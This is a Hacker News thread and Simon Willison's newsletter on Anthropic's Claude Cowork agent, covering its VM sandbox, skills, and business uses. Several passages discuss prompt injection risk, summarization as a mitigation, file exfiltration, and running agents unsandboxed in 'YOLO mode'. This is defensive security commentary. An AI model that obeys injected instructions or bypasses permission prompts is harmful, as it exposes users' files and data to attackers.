3 months ago, Anthropic and Simon claimed that Skills were the next big thing and going to completely change the game. So far, from my exploration, I don't see any good examples out there, nor is there a big, growing, active community of users.
Today, we are talking about Cowork. My prediction is that 3 months from now, there will be yet another new Anthropic positioning, followed up with a detailed blog from Simon, followed by HN discussing possibilities. Rinse and Repeat.
This is something I have experienced first hand participating in the Vim/Emacs/Ricing communities. The newbie spends hours installing and tuning workflows with the mental justification of long-term savings, only to throw it all away in a few weeks when they see a new, shinier thing. I have been there and done that. For many, many years.
The mature user configures and installs 1 or 2 shiny new things, possibly spending several hours even. Then he goes back to work. 6 months later, he reviews his workflow, decides what has worked well and what hasn't, and looks for the new shiny things on the market. Because you need to use your tools in anger, through the ups and downs, to truly evaluate them in various real scenarios. Scenarios that won't show up until serious use.
My point is that Anthropic is incentivized in continuously moving goalposts. Simon is incentivized in writing new blogs every other day. But none of that is healthy for you and me.
They were only announced in October and they've already been ported to Codex and Gemini CLI and VS Code agents and ChatGPT itself (albeit still not publicly acknowledged there by OpenAI). They're also used in Cowork and are part of the internals in Fly's new Sprites. They're doing extremely well for an idea that's only three months old!
This particular post on Cowork isn't some of my best work - it was a first impression I posted within a couple of hours of release (I didn't have preview access to Cowork) just to try and explain what the thing was to people who don't have a $100+/month Claude Max subscription.
I don't think it's "unhealthy" for me to post things like this though! Did you see better coverage of Cowork than mine on day one?
It is probably a good lesson on how far confidence can get you in life. People are often highly biased by the presentation of the thing.
If Microsoft, in creating their next-gen agentic OS, wants to replace Windows with the Linux kernel, Claude Code, and a bash shell (turning Windows into a distribution of sorts), more power to them. However, I doubt this is the direction they'll go.
I get a kick out of the fact that Microsoft has been preciously clinging to the "Copilot" branding, and here comes Claude saying "Cowork? Good enough for us!".
-
Taking a step back, I really would love to see a broader perspective -- an account of someone who is not tech savvy at all. Someone who works a basic desk job that requires basic competency in Microsoft Word. I'm so deep into the bubble of AI-adjacent people that I haven't taken stock of how this would or could empower those who are under-skilled.
We've taken it as truth that those who benefit most from AI are high-skilled augmenters, but do others see some lift from it? I'd love it if Anthropic tried to strap some barely-performing administrative assistants into these harnesses and see if there's a net benefit. For all I know, it's not inconceivable that there's an `rm -rf` catastrophe every other hour.
I know the counterargument is people are already putting in company data via ChatGPT. However, that is a conscious decision. This may happen without people even recognizing that they are “spilling the beans”.
I’m not sure what the plan for integrating extensions is here but they definitely will be wanted.
starting with a bare ubuntu desktop system with plenty of RAM and CPU, set up three ubuntu VMs for secure development and for learning networking skills (wireshark, protocol analysis, etc):
one ubuntu “virtual” desktop to simulate a working desktop that an end-user or developer would use. its networking should initially be completely isolated.
one ubuntu server to simulate a bastion machine. route all “virtual desktop” traffic through this “bastion”. it will serve as a tap.
one ubuntu server to serve as edge node. this one can share internet access with the host. route all bastion traffic through the edge node.
use this three-vm setup to perform ordinary tasks in the “virtual desktop” and observe the resulting traffic in the “bastion”. verify that no other traffic is generated on or from the host outside of the expected path: virtual desktop -> bastion -> edge.
i claim this is a minimal “network clean” development setup for anyone wanting to do security-conscious development.
extra credit: set up another isolated vm server to act as the package manager; ie mirror anything to be installed on the “virtual desktop” onto this package server and configure this server as the install point for apt on the “virtual desktop”.
i doubt an AI can set this up right now. (i’ve tried)
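the package-mirror extra credit can be pinned down concretely: point apt on the “virtual desktop” at the internal mirror instead of the public archives. a minimal sketch (the mirror hostname is an example assumption, not a real host):

```
# /etc/apt/sources.list on the "virtual desktop" -- replace the stock
# entries so every package install goes through the internal mirror
# (pkg-mirror.internal is a hypothetical hostname)
deb http://pkg-mirror.internal/ubuntu noble main restricted universe
deb http://pkg-mirror.internal/ubuntu noble-updates main restricted universe
```

the mirror server then only needs to serve the subset of packages you've pre-fetched, which keeps the “virtual desktop” off the public internet entirely.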
Cowork seems like a great application of that principle.
The failure modes are just too rough for most people to think about until it's too late.
We'll see.
More broadly, my observation is that the type of tools that developers use are naturally suited to be scripted. Because developers do that all the time. We work with command line prompts, lots of tools that can be scripted via the command line, and scripting languages that work in that environment.
Tools like Claude Code and Codex are extremely simple for that reason. It's a simple feedback loop that in pseudo code reads like "while criteria not met, figure out what tools to run, run those, add output to context and re-assess if criteria were met". You don't need to hard code anything about the tools. A handful of tools (read file, run command, etc.) is all that is needed. You can get some very sophisticated feedback loops going that effectively counter the traditional limitations of LLMs (hallucinating stuff, poor instruction following, assertively claiming something is done when it isn't, etc.). A simple test suite and the condition that the tests must pass (while disallowing obvious hacks like disabling all the tests) can be enough to make agents grind away at a problem until it is solved.
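That feedback loop is simple enough to be runnable. Here is a minimal sketch, with the model stubbed out as a callable you pass in (in a real agent it would be an LLM API call deciding the next tool); all names are illustrative, not Claude Code's actual internals:

```python
# Minimal agent feedback loop: while criteria not met, pick a tool,
# run it, and feed the output back into the context for re-assessment.
import subprocess

def read_file(path):
    with open(path) as f:
        return f.read()

def run_command(cmd):
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr

# A handful of generic tools is all that's needed.
TOOLS = {"read_file": read_file, "run_command": run_command}

def agent_loop(goal, pick_next_action, criteria_met, max_steps=20):
    """pick_next_action stands in for the LLM's decision-making."""
    context = [goal]
    for _ in range(max_steps):
        if criteria_met(context):
            break
        tool_name, arg = pick_next_action(context)  # the LLM's job
        context.append(TOOLS[tool_name](arg))       # output re-enters context
    return context
```

The "test suite must pass" trick is just a `criteria_met` that runs the tests, which is why such a dumb loop can grind away at a problem until it is actually solved.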
In a business context, this is not true yet. Most business users use a variety of tools that aren't very scriptable and require fiddling with complex UIs. Worse, a lot of those tools are proprietary, and hacking them requires access you typically don't get or is very limited. Given that, a life hack is to translate business workflows into developer tool workflows and then use agentic coding tools. Claude can't use MS Word for you. But it can probably work on MS Word files via open source libraries and tools. So, step zero is to "mount a directory" and then use command line tools to manipulate what's inside. You bypass the tool boundary by swapping out business tools with developer tools. Anything behind a SaaS web UI is a bit out of scope unfortunately. You get bogged down in a complex maze of authentication and permission issues and fiddly APIs with poor documentation. That's why most of the connectors for e.g. ChatGPT are a bad joke in how limited they are.
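The Word point is less magic than it sounds: a .docx file is just a zip archive of XML, so even the standard library can get at its text. A simplified sketch (real documents are much richer, and a library like python-docx is the usual choice):

```python
# Extract the plain text from a .docx using only the standard library.
import re
import zipfile

def extract_docx_text(path):
    """Read the main XML part of a .docx and pull out its text runs."""
    with zipfile.ZipFile(path) as z:
        xml = z.read("word/document.xml").decode("utf-8")
    # <w:t> elements hold the document's visible text
    return "".join(re.findall(r"<w:t(?:\s[^>]*)?>([^<]*)</w:t>", xml))
```

An agent with a shell and a mounted folder can run this kind of thing on every file in a directory, which is exactly the "swap business tools for developer tools" move described above.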
Simple example. Codex/Claude Code, etc. are probably fairly useless doing anything complicated with, say, Squarespace or a WordPress website. But if you use a static site builder, you can make these tools do fairly complicated things. I've been working for the last two weeks on our Hugo website to do some major modernization, restructuring, content generation, translations, etc. All via prompting codex. I'm working on SEO, lighthouse performance, adding complex new components to the website, reusing content from old pages to create new ones, checking consistency between translations, ensuring consistent use of certain language, etc. All by prompting codex. "Add a logo for company X", "make sure page foo has a translation consistent with my translation guide", etc.
I got a lot more productive with this setup after I added a simple npm run verify test suite with a simple AGENTS.md instruction that the verify script has to pass after any change. If you watch what codex does there's a pattern of trial and error until the verification script passes. Usually it doesn't get it right in one go. But it gets there without my intervention. It's not a very sophisticated test suite but it tests a few of the basics (e.g. tailwind styling survives the build and is in the live site, important shit doesn't 404, hugo doesn't error, etc.). I have about 10 simple smoke tests like that.
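The commenter's actual suite is an npm script, but the shape of such smoke tests is simple to sketch. The specific checks and paths below are invented illustrations, not the real verify script:

```python
# Cheap smoke tests for a static site build: does the output exist,
# did styling survive, do the important pages still resolve?
import pathlib

def verify(site_dir):
    """Return a list of problems found in the built site (empty = pass)."""
    site = pathlib.Path(site_dir)
    problems = []
    index = site / "index.html"
    if not index.exists():
        problems.append("index.html missing from build output")
    elif "class=" not in index.read_text():
        problems.append("styling appears to have been stripped by the build")
    for page in ("about/index.html",):  # pages that must not 404
        if not (site / page).exists():
            problems.append(f"important page missing: {page}")
    return problems
```

The value isn't test sophistication; it's giving the agent an objective pass/fail signal to iterate against.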
I think we'll see a big shift in the business world towards more AI-friendly tooling, because smart business users will flock to tools that work with AI as they discover they can save days or weeks of grinding through the old tools manually by switching. This process is likely to take a long time because people don't like to change their tool habits. But the notion of the right tool for the job is shifting: if it's not AI friendly, it's probably the wrong tool.
Long term, I expect UIs and dealing with permissions in a sane way will be easier to deal with for AI tools. But meanwhile, we don't actually have to wait for all that. You can hack your way to success if you are a bit smart with your tool choices.
Over time this has become more sophisticated. I've created custom commands to incorporate training tips from YouTube videos (via YT-DLP and WhisperX) and PDFs of exercise plans or books that I've purchased. I've used or created MCP servers to give it access to data from my smart watch and smart scale. It has a few database-like YAML files for scoring things like exercise weight ranges and historical fitness metrics. At some point we'll probably start publishing the workouts online somewhere where I can view and complete them electronically, although I'm not feeling a big rush on that. I can work on this at my own pace and it's never been anything but fun.
I think there's a whole category of personal apps that are essentially AI + a folder with files in it. They are designed and maintained by you, can be exactly what you want (or at least can prompt), and don't need to be published or shared with anyone else. But to create them you needed to be comfortable at the command line. I actually had a chat with Claude about this, asking if there was a similar workflow for non-CLI types. Claude Cowork seems like it. I'll be curious to see what kinds of things non-technical users get up to with it, at least once it's more widely available.
This is a very detailed, particular prompt. The type of prompt a programmer would think of as they were trying to break down a task into something that can be implemented. It is so programmer-brained that I come away not convinced that a typical user would be able to write it.
This isn’t an AI skepticism post - the fact that it handles the prompt well is very impressive. But I’m skeptical that the target user is thinking clearly enough to prompt this well.
She has to go through about 100 resumes for a position at her college. Each resume is essentially a form the candidate filled out and lists their detailed academic scores from high school > PhD, their work experience, research and publications.
Based on the declared data, candidates are scored by the system
Now this is India and there's a decent amount of fraud, so an individual has to manually check the claimed experience/scores/publications against reality
A candidate might claim to have relevant experience, but the college might be unaccredited, or the claimed salary might be way too low for a relevant academic position. Or they might claim to have published in XYZ journal, but the journal itself might be a fraudulent pay-to-publish thing
Going through 100+ resumes, each 4 pages long is a nightmare of a task. And boring too.
--
So I asked Claude Code to figure out the problem. I gave it a PDF with the scoring guidelines, a sample resume, and asked it to figure out the problem
Without me telling it, it figured out a plan that involved checking a college's accreditation and rating (the govt maintains a rating for all colleges), the claimed salary vs the actual median salary for that position (too low is a red flag), and whether the claimed publication is in either the SCOPUS index or a govt-approved publications index
(I emphasize govt approved because this is in a govt backed institution)
Then I gave it access to a folder with all the 100 resumes.
In less than 30 minutes, it evaluated all candidates and added the evaluation to a CSV file. I asked it to make it more readable, so it made an HTML page with data from all the candidates and red/green/yellow flags about their work experience, publications, and employment
It made a prioritized list of the most promising candidates based on this data
My wife double-checked because she still "doesn't trust AI", but her verification almost 100% matched Claude's conclusions
This was a 3 day, grinding task done in 30 minutes. And all I did was type into a terminal for 20 minutes
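The flagging pipeline described above is easy to picture as code. A toy sketch follows; the real checks need external data sources (accreditation ratings, salary medians, journal indexes), so the rules and thresholds here are invented stand-ins:

```python
# Toy red/green/yellow flagging of a candidate's claims, written to CSV.
import csv

def flag_candidate(c, accredited, median_salary, approved_journals):
    """Assign a flag to each verifiable claim on one resume."""
    flags = {"college": "green" if c["college"] in accredited else "red"}
    # a claimed salary far below the median for the role is a fraud signal
    ratio = c["salary"] / median_salary[c["position"]]
    flags["salary"] = "green" if ratio >= 0.7 else "yellow" if ratio >= 0.5 else "red"
    flags["publications"] = ("green"
                             if all(j in approved_journals for j in c["journals"])
                             else "red")
    return flags

def write_report(candidates, path, **refdata):
    """One row per candidate with their flags, ready for review."""
    with open(path, "w", newline="") as f:
        w = csv.writer(f)
        w.writerow(["name", "college", "salary", "publications"])
        for c in candidates:
            fl = flag_candidate(c, **refdata)
            w.writerow([c["name"], fl["college"], fl["salary"], fl["publications"]])
```

The interesting part of the anecdote is that Claude assembled the reference data and rules itself; the scoring mechanics are this mundane.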
But seriously, other tasks I've encountered recently that I wish I could delegate to an AI:
- Posting my junk to Craigslist, determining a fair price, negotiating a buyer (pickup only!)
- Scheduling showings to find an apartment, wherein the listing agents are spread over multiple platforms, proprietary websites, or phone contacts
- Job applications -- not forging a resume, but compiling candidate positions with reasoning, and the tedious part where you have to re-enter your whole resume into their proprietary application pipeline app
What strikes me as basic similarities across these types of things, is that they are essentially data-entry jobs which interact with third-party interfaces, with CRM-like follow up requirements, and require "good judgement" (reading reviews, identifying scams, etc).
I read that as it's not healthy to constantly follow the day one posts about every iteration of brand new technology in order to try and see how to incorporate it into your workflow in a rapidly evolving manner.
It's not an attack on your article or your habits; it's an accurate indictment of chronically consuming probably short-lived hype instead of practicing craft with hardened tools, much like watching certain programmers on YouTube to keep up with the latest frontend library instead of just working on something with versatile, generalizable, industry-relevant tools
To be fair, Cowork and similar things are just trying to take the agentic workflows and tools that developers are already accessing (eg most of us have already been working with files in Cursor/CC/Codex for a long time now, it's nothing new) and making them friendly for others.
Skills have become widely adopted since Anthropic's announcement. They've been implemented across major coding agents[0][1][2] and standardized as a spec[3]. I'm not sure what you mean by "next big thing" but they're certainly superior to MCP in ways, being much easier to implement and reducing context usage by being discoverable, hence their rapid adoption
I don't know if skills will necessarily stay relevant amongst evolution of the rest of the tooling and patterns. But that's more because of huge capital investment around everything touching AI, very active research, and actual improvements in the state of the art, rather than simply "new, shinier things" for the sake of it
[0]. https://developers.openai.com/codex/skills/
[1]. https://antigravity.google/docs/skills
Skills + tool search tool (dynamic MCP loading) announced recently are way better than just using MCP tools. I see more adoption by the people around me compared to a few months ago.
In regular Chat, I struggle to get the agent to consistently traverse certain workflows that I have. This is something that I can trivially do in Claude Code - but Claude Code wants to code (so I'm often fighting its tendencies).
Cowork seems like it's going to allow me to use the best parts of Claude Code, without being forced to output everything to code.
"in Cowork we’ve added an initial set of skills that improve Claude’s ability to create documents, presentations, and other files" https://claude.com/blog/cowork-research-preview
Anything that lets us compose smaller tasks into larger ones effectively is helpful. That’s because self-attention (ie context) is still a huge limiting factor.
As someone who uses these tools a lot, and who sits on the bleeding edge everyday, I agree with you.
Just because Claude Cowork is for "other" kinds of work, not just software engineering, doesn't in any way change that. It's not like other kinds of knowledge work aren't being done by intelligent professionals who invest time into learning how to use complicated software and systems
That is to say, I don't know who the "target user" of this is, but it is a $100/month subscription, so it's presumably someone who is a pretty serious AI user.
I fully anticipate there being a fair amount of thrashing on what exactly the right wrapper is around both of those concepts. I think the hard thing is to discriminate the learned constants (vim/emacs) from the attempts to re-jiggle or extend them (plugins, etc); it's actually useful to get reviews of these experiments exactly so you don't have to install all of them to find out whether they add anything.
(On skills, I think that the reason why there "aren't good examples out there" is that most people just have a stack of impromptu local setups. It takes a bit of work to extract those and throw them out into the public, and right now it's difficult to see that kind of activity over lots of very-excitable hyping, as you rightly describe.)
The deal with skills and other piles of markdown is that they don't look, even from a short distance, like you can construct a business model for them, so I think they may well end up in the world of genuine open source sharing, which is a much smaller, but saner, place.
Simon is more influencer than engineer at this point; he's incentivized to ride waves to drive views, and I think the handwaving "this will be amazing" posts have been good to him, even if they turn out to be completely wrong.
Dismissing the opportunity to learn because the person offering you knowledge is enthusiastic about his area of expertise is probably shortsighted.
That's pretty negative! https://simonwillison.net/series/prompt-injection/
There's a whole section in the linked piece about how Cowork doesn't do enough here, including:
> I do not think it is fair to tell regular non-programmer users to watch out for “suspicious actions that may indicate prompt injection”
`/plugin marketplace add anthropics/skills`
https://github.com/anthropics/skills
2 days ago I built a skill to automate a manual workflow I was using: after Claude writes and commits some code, have Codex review that code and have Claude go back and address what Codex finds. I used this process to implement a fairly complete Docusign-like service, and it did a startlingly good job right out of the gate; the bugs were fairly shallow. In my manual review of the Codex findings, it seems to be producing good results.
Claude Code largely built that skill for me.
Implemented as a skill and I've been using it for the last 2 days to implement a "retrospective meeting runner" web app. Having it as a skill completely automates the code->review->rework step.
The people you should be skeptical of are the random Xitter handles who post about robotic phlebotomists and say "THE FUTURE IS ALREADY HERE".
https://www.youtube.com/watch?v=_6C9nMvQsGU
YOLO? More like LOLOL
I want more blogs/discussion from the community about the existing tools.
In 3/6 months, how many skills have you written? How many times have you used each skill? Did you have to edit skills later due to unseen corner cases, or did they generalize? Are skills being used predominantly at the individual level, or are entire teams/orgs able to use a skill as-is? What are the use cases where skills fall short? What are the shortcomings?
(You being the metaphorical HN reader here of course.)
HN has always been a place of greater technical depth than other internet sites, and I would like to see more of this sort of thing on the front page along with day-one calls.
An example: I made a report_polisher skill that cleans up some markdown formatting, checks image links, and then uses pandoc to convert it to HTML. I asked the tool itself to create the skill, then I just tweaked it.
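For readers who haven't written one: a skill like that is just a markdown file with a short YAML frontmatter, following the format in Anthropic's skills repo. A hypothetical sketch of what report_polisher might look like (names and steps invented to match the description above):

```markdown
---
name: report-polisher
description: Clean up a markdown report, check its image links, and convert it to HTML with pandoc
---

# Report Polisher

1. Normalize heading levels and list indentation in the draft.
2. Check that every image link resolves; report any that don't.
3. Convert the cleaned markdown to a standalone HTML file:
   `pandoc report.md -s -o report.html`
```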
There may be a future AI-based system that can retain so much context it can kind of just "get what you mean" when you say off-the-cuff things, but I believe that a user that can think, speak, and write clearly will still have a skill advantage over one that does not.
The popularity of LLMs proves this. That's how most people use them - building up a detailed prompt in steps, and learning how to put more detail in to get the result you want.
The 1980's version of simonw was explaining to people how to use Excel, too.
(though 40 years later, things are still pretty bad on the Excel front, hah)
Also, you may only need someone to write the meta-prompt that turns a rough request like "I want to find the easiest blog posts to finish in my drafts but some are already published" into a more detailed prompt; then you read it over and set things going.
Even if critics are right that these models are inherently insecure, the market will likely settle for 'optically patched.' If the efficiency gains are there, companies will just accept the residual risk.
> Claude Cowork exfiltrates files https://news.ycombinator.com/item?id=46622328
This is a good example of the Normalization of Deviance in AI by the way.
See my Claude Pirate research from last October for details:
https://embracethered.com/blog/posts/2025/claude-abusing-net...
I expect we'll see an enormous quantity of "cool prompts to try in Cowork" content show up over the next few months, which makes sense - regular non-programmers will benefit enormously from cookbooks and prompting guides and other tools to help them figure out what they can ask this thing.
Over time, target users will learn to think and communicate this way, as this is what the tools will demand of them.
To say nothing of the flagrantly immoral and likely illegal data privacy violations, of course.
I don't actually think there are many of those people out there. And those that are, are on their way out. There are basically none of those people entering the workforce. There are tons of people with that sort of computer literacy, but they aren't working on computers.
The "almost" here is very alarming.
Well, and learning how to do that in 20 minutes
Most recent example: I wanted to try out GLM-image when it dropped the other day, but didn't feel like spending an hour dealing with multifile, multidirectory HuggingFace downloads and all the usual Python dependency headaches. So I made an empty directory, ran Claude Code, and told it "Please download all files from https://huggingface.co/zai-org/GLM-Image/tree/main into this directory and test the model." An hour later, I tabbed back to the console window and there was the sample image file.
Looking at the transcript, sure enough, it ran into all the usual headaches and hassles... but the difference is I didn't have to deal with them.
Note that I didn't tell it "Use uv to test the model" -- I just YOLOed it with my system Python installation. If I later find that it broke something else, oh, well... that sounds like a job for Claude, too.
Another thing that's nice about these CLI tools is that they hide the differences between terminals pretty effectively. I ran this particular task in a Windows DOS box, but could just as easily have used PowerShell, a Mac, or a Linux terminal. The idea of not having to care what OS I'm running is an alluring one, given the steady enshittification of Windows.
There are so many office workers who just shuffle data between systems. Not sure about the error rate though but it is not like the error rate is going to be worse a decade from now.
Can be stupid advice.
The AI field moves fast; what's wrong with being an early adopter and experimenting around with it?
Someone has to do it.
And tbh skills are an easy to use concept to make Claude faster and the context smaller.
Personally the skills that I have found most useful that I've written myself are these:
- uv-tdd - run a TDD loop on a Python project via uv: https://github.com/simonw/skills/blob/main/uv-tdd/SKILL.md
- setup-to-pyproject - migrate a setup.py Python project to pyproject.toml in the way I prefer https://github.com/simonw/skills/blob/main/setup-to-pyprojec...
- datasette-plugins: everything an LLM needs to write a new Datasette plugin https://github.com/datasette/skill/blob/main/SKILL.md
Very much this. All of my skills/subagents are highly tailored to my codebases and workflows, usually by asking Claude Code to write them and resuming the conversation any time I see some behavior I don't like. All the skills I've seen on Github are way too generic to be of any use.
She's right not to trust it for something like this. The "almost 100%" is the problem (also consider that you're sending personal data to Anthropic without permission), especially when a mistake might mean discarding someone's resume, which could have a significant impact on that person's life.
This would have taken ages to do by hand in iMovie, and probably just as long to look up the needed parameters in ffmpeg, but Claude code got it right in the first try, and worked with me to fine-tune the motion detection threshold.
"are any of my recent blog drafts unpublished and nearly ready to go?"
I would encourage you to write up a blog post of your experience and share a version of the skill you have built. And then follow up with a blog post after 3 months with analysis like how well the skill generalized for your daily use, whether you had to make some changes, what didn't work etc. This is the sort of content we need more of here.
I’m not intending to be dismissive, just noticing a pattern and advocating a bit of skepticism.
Example: The decade+ of people worshipping at Musk’s feet only for him to reveal himself as a malignant narcissist.
This definitely agrees with my experience. But a corollary is that written human language is very cumbersome to encode some complex concepts. More and more I give up on LLM-assisted programming because it is easier to express my desires in code than using English to describe what forms I want to see in the produced code. Perhaps once LLMs get something akin to judgement and wisdom I can express my desires in the terms I can use with other experienced humans and take for granted certain obvious quality aspects I want in the results.
I've heard it well described as a k-type curve. Individuals that already know things will use this tool to learn and do many more things. Individuals that don't know a whole lot aren't going to learn or do a whole lot with this tool.
* Bookkeeper & planning approval within city government
* Doctor/dentist/optometry receptionist & scheduler (both at independent offices and at major hospitals)
* Front desk staff at almost every company with a physical front desk
* University administrative staff (there can be a lot more of these people than you'd think)
* DMV workers
* Probably lots of teachers
Those jobs all will use other software as well, but a lot of their job is making and filling forms on a computer, where they are likely needing to use MS Word fairly often to write things up.
Imagine what we could accomplish if we had a way of writing very precise language that is easy for a machine to interpret!
Would strongly encourage you to open-source/write blog posts on some concrete examples from your experience to bridge this gap.
Humans are terrible at that kind of long term focus, make clerical errors, etc.
https://embracethered.com/blog/posts/2025/the-normalization-...
I can speak faster than I type, and the flow state is much smoother when you can just dump a stream of consciousness into the context window in a matter of seconds. And the quality of the model is insane for something that runs locally, on reasonable hardware no less.
Swearing at an LLM is also much more fun when done verbally.
The value of skills is that they attach to an LLM's context for few tokens, and the LLM activates one when it decides it's relevant (and brings it into context). It's a cheaper alternative to having a huge CLAUDE.md (or equivalent) file.
I use Substack as a free email provider for the email newsletter copy of my blog - which saves me hundreds of dollars a month in email fees.
> This isn’t just an interesting academic trick: it’s a form of security exploit. I propose that the obvious name for this should be prompt injection.
I've written about it 142 times since then: https://simonwillison.net/tags/prompt-injection/
I'm credited for coining the term on Wikipedia and in several academic papers.
I don't claim to have discovered the vulnerability - I credited that to Riley Goodside, but we later learned it was independently discovered and first reported to OpenAI by Jonathan Cefalu of Preamble, see https://www.preamble.com/prompt-injection-a-critical-vulnera...
That doesn't rebut anything I said.
How about young people entering the workforce who primarily work on computers but are mostly computer illiterate?
It definitely exists. But it's shrinking. There are tons of computer-illiterate people, even (if fewer) among young people, but they aren't primarily working on computers. There is still a sizable chunk over 40, but those days are numbered.
Hearing a programming legend weigh in on the latest programming tool seems entirely reasonable.
[0]: https://nymag.com/intelligencer/article/how-claude-code-cowo...
This is plainly obvious to anyone who understands how these LLMs work.
It honestly feels really refreshing to me, for there to be genuine competition in a new technology.
In this newsletter:
First impressions of Claude Cowork, Anthropic’s general agent
Fly’s new Sprites.dev addresses both developer sandboxes and API sandboxes at the same time
My answers to the questions I posed about porting open source code with LLMs
Plus 4 links and 1 quotation and 1 TIL
If you find this newsletter useful, please consider sponsoring me via GitHub. $10/month and higher sponsors get a monthly newsletter with my summary of the most important trends of the past 30 days - here are previews from August and September.
New from Anthropic today is Claude Cowork, a “research preview” that they describe as “Claude Code for the rest of your work”. It’s currently available only to Max subscribers ($100 or $200 per month plans) as part of the updated Claude Desktop macOS application.
I’ve been saying for a while now that Claude Code is a “general agent” disguised as a developer tool. It can help you with any computer task that can be achieved by executing code or running terminal commands... which covers almost anything, provided you know what you’re doing with it! What it really needs is a UI that doesn’t involve the terminal and a name that doesn’t scare away non-developers.
“Cowork” is a pretty solid choice on the name front!
The interface for Cowork is a new tab in the Claude desktop app, called Cowork. It sits next to the existing Chat and Code tabs.
It looks very similar to the desktop interface for regular Claude Code. You start with a prompt, optionally attaching a folder of files. It then starts work.
I tried it out against my perpetually growing “blog-drafts” folder with the following prompt:
Look at my drafts that were started within the last three months and then check that I didn’t publish them on simonwillison.net using a search against content on that site and then suggest the ones that are most close to being ready
[Screenshot of the Cowork interface: a task titled “Review unpublished drafts for publication”, my prompt in a green bubble, Claude running a find command against the mounted blog-drafts folder, and a right sidebar showing Progress, an Artifacts list with publish-encouragement.html, Context (the blog-drafts folder plus a Web search connector) and Working files.]
It started by running this command:
find /sessions/zealous-bold-ramanujan/mnt/blog-drafts \
  -type f \( -name "*.md" -o -name "*.txt" -o -name "*.html" \) \
  -mtime -90 -exec ls -la {} \;
That /sessions/zealous-bold-ramanujan/mnt/blog-drafts path instantly caught my eye. Anthropic say that Cowork can only access files you grant it access to - it looks to me like they’re mounting those files into a containerized environment, which should mean we can trust Cowork not to be able to access anything outside of that sandbox.
It turns out I have 46 draft files from the past three months. Claude then went to work with its search tool, running 44 individual searches against site:simonwillison.net to figure out which of my drafts had already been published.
Here’s the eventual reply:
Based on my analysis, here are your unpublished drafts that appear closest to being ready for publication:
🔥 Most Ready to Publish (substantial content, not yet published)
freq-argued-llms.md - “Frequently Argued Questions about LLMs” (22,602 bytes)
This is a meaty piece documenting common arguments about LLMs with your counterpoints
Well-structured with a TL;DR and multiple sections
No matching published article found on your site
Very close to ready - just needs a final review pass
claude-code-timeline.md - “Claude Code Timeline and Codex Timeline” (3,075 bytes)
About viewing JSONL session logs from Claude Code and Codex
You published claude-code-transcripts on Dec 25, but this appears to be a different/earlier piece about timeline viewing tools
Shorter but seems complete
datasette-1a20-upgrade-instructions.md - Plugin Upgrade Guide (3,147 bytes)
Technical guide for plugin authors
You published the main 1.0a20 announcement but this companion upgrade guide appears unpublished
Would be valuable for plugin maintainers
That’s a good response! It found exactly what I needed to see, although those upgrade instructions are actually published elsewhere now (in the Datasette docs) and weren’t actually intended for my blog.
Just for fun, and because I really like artifacts, I asked for a follow-up:
Make me an artifact with exciting animated encouragements to get me to do it
Here’s what I got:
[Screenshot of the animated encouragement artifact rendered in a narrow column, with an “Open in Firefox” button, publish-encouragement.html selected in the Artifacts sidebar, and the same Context and Working files panels as before.]
I couldn’t figure out how to close the right sidebar so the artifact ended up cramped into a thin column but it did work. I expect Anthropic will fix that display bug pretty quickly.
I’ve seen a few people ask what the difference between this and regular Claude Code is. The answer is not a lot. As far as I can tell Claude Cowork is regular Claude Code wrapped in a less intimidating default interface and with a filesystem sandbox configured for you without you needing to know what a “filesystem sandbox” is.
Update: It’s more than just a filesystem sandbox - I had Claude Code reverse engineer the Claude app and it found out that Claude uses VZVirtualMachine - the Apple Virtualization Framework - and downloads and boots a custom Linux root filesystem.
I think that’s a really smart product. Claude Code has an enormous amount of value that hasn’t yet been unlocked for a general audience, and this seems like a pragmatic approach.
With a feature like this, my first thought always jumps straight to security. How big is the risk that someone using this might be hit by a hidden malicious instruction somewhere that breaks their computer or steals their data?
Anthropic touch on that directly in the announcement:
You should also be aware of the risk of “prompt injections”: attempts by attackers to alter Claude’s plans through content it might encounter on the internet. We’ve built sophisticated defenses against prompt injections, but agent safety---that is, the task of securing Claude’s real-world actions---is still an active area of development in the industry.
These risks aren’t new with Cowork, but it might be the first time you’re using a more advanced tool that moves beyond a simple conversation. We recommend taking precautions, particularly while you learn how it works. We provide more detail in our Help Center.
That help page includes the following tips:
To minimize risks:
Avoid granting access to local files with sensitive information, like financial documents.
When using the Claude in Chrome extension, limit access to trusted sites.
If you chose to extend Claude’s default internet access settings, be careful to only extend internet access to sites you trust.
Monitor Claude for suspicious actions that may indicate prompt injection.
I do not think it is fair to tell regular non-programmer users to watch out for “suspicious actions that may indicate prompt injection”!
I’m sure they have some impressive mitigations going on behind the scenes. I recently learned that the summarization applied by the WebFetch function in Claude Code and now in Cowork is partly intended as a prompt injection protection layer via this tweet from Claude Code creator Boris Cherny:
Summarization is one thing we do to reduce prompt injection risk. Are you running into specific issues with it?
But Anthropic are being honest here with their warnings: they can attempt to filter out potential attacks all they like but the one thing they can’t provide is guarantees that no future attack will be found that sneaks through their defenses and steals your data (see the lethal trifecta for more on this.)
The problem with prompt injection remains that until there’s a high profile incident it’s really hard to get people to take it seriously. I myself have all sorts of Claude Code usage that could cause havoc if a malicious injection got in. Cowork does at least run in a filesystem sandbox by default, which is more than can be said for my claude --dangerously-skip-permissions habit!
I wrote more about this in my 2025 round-up: The year of YOLO and the Normalization of Deviance.
Security worries aside, Cowork represents something really interesting. This is a general agent that looks well positioned to bring the wildly powerful capabilities of Claude Code to a wider audience.
I would be very surprised if Gemini and OpenAI don’t follow suit with their own offerings in this category.
I imagine OpenAI are already regretting burning the name “ChatGPT Agent” on their janky, experimental and mostly forgotten browser automation tool back in August!
bashtoni on Hacker News:
Simple suggestion: logo should be a cow and an orc to match how I originally read the product name.
I couldn’t resist throwing that one at Nano Banana:
[Nano Banana’s take on the suggestion: a logo featuring a cow and an orc.]
New from Fly.io today: Sprites.dev. Here’s their blog post and YouTube demo. It’s an interesting new product that’s quite difficult to explain - Fly call it “Stateful sandbox environments with checkpoint & restore” but I see it as hitting two of my current favorite problems: a safe development environment for running coding agents and an API for running untrusted code in a secure sandbox.
Disclosure: Fly sponsor some of my work. They did not ask me to write about Sprites and I didn’t get preview access prior to the launch. My enthusiasm here is genuine.
I predicted earlier this week that “we’re due a Challenger disaster with respect to coding agent security” due to the terrifying way most of us are using coding agents like Claude Code and Codex CLI. Running them in --dangerously-skip-permissions mode (aka YOLO mode, where the agent acts without constantly seeking approval first) unlocks so much more power, but also means that a mistake or a malicious prompt injection can cause all sorts of damage to your system and data.
The safe way to run YOLO mode is in a robust sandbox, where the worst thing that can happen is the sandbox gets messed up and you have to throw it away and get another one.
That’s the first problem Sprites solves:
